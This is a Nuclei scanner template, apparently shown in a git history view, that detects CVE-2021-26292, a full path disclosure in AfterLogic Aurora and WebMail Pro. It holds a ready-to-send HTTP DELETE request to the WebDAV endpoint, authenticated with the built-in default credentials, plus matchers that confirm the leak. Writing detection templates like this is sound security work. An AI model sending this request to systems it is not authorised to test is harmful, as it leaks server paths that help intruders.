nuclei-templates/http/cves/2021/CVE-2021-26292.yaml

46 lines
1.6 KiB
YAML
Raw Normal View History

2023-11-24 00:42:45 +00:00
id: CVE-2021-26292
info:
2023-11-25 10:15:44 +00:00
name: AfterLogic Aurora and WebMail Pro < 7.7.9 - Full Path Disclosure
2023-11-24 00:42:45 +00:00
author: johnk3r
2023-11-25 10:15:44 +00:00
severity: low
description: |
AfterLogic Aurora and WebMail Pro products with 7.7.9 and all lower versions are affected by this vulnerability, simply sending an HTTP DELETE request to WebDAV EndPoint with built-in “caldav_public_user@localhost” and its the predefined password “caldav_public_user” allows the attacker to obtain web root path.
2023-11-24 00:42:45 +00:00
reference:
- https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26292-full-path-disclosure-vulnerability.md
2023-11-25 10:15:44 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-26292
classification:
cve-id: CVE-2021-26292
2023-11-24 00:42:45 +00:00
metadata:
2023-11-25 10:15:44 +00:00
verified: true
2023-12-05 09:50:33 +00:00
max-request: 1
2023-11-24 00:42:45 +00:00
vendor: AfterLogic
product: AfterLogic Aurora & WebMail
2023-12-05 09:50:33 +00:00
fofa-query: "X-Server: AfterlogicDAVServer"
2024-01-14 09:21:50 +00:00
tags: cve2021,cve,afterlogic,path,disclosure,AfterLogic
2023-11-24 00:42:45 +00:00
http:
2023-11-25 10:15:44 +00:00
- raw:
- |
DELETE /dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021 HTTP/1.1
Host: {{Hostname}}
Authorization: Basic Y2FsZGF2X3B1YmxpY191c2VyQGxvY2FsaG9zdDpjYWxkYXZfcHVibGljX3VzZXI
2023-11-24 00:42:45 +00:00
matchers-condition: and
matchers:
- type: word
2023-11-25 10:15:44 +00:00
part: body
2023-11-24 00:42:45 +00:00
words:
- "caldav_public_user"
- "GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"
condition: and
2023-11-25 10:15:44 +00:00
- type: word
part: header
words:
- "application/xml"
2023-11-24 00:42:45 +00:00
- type: status
status:
- 404
# digest: 4a0a00473045022100ad5306a2d12bd71a320ef1a609dc0fcc26696853a67e766b855fec5502950393022032de7c3a4f65e5633891b3f3495fd75c4e567f7b884cd001f47b0bb141e57037:922c64590222798bb761d5b6d8e72950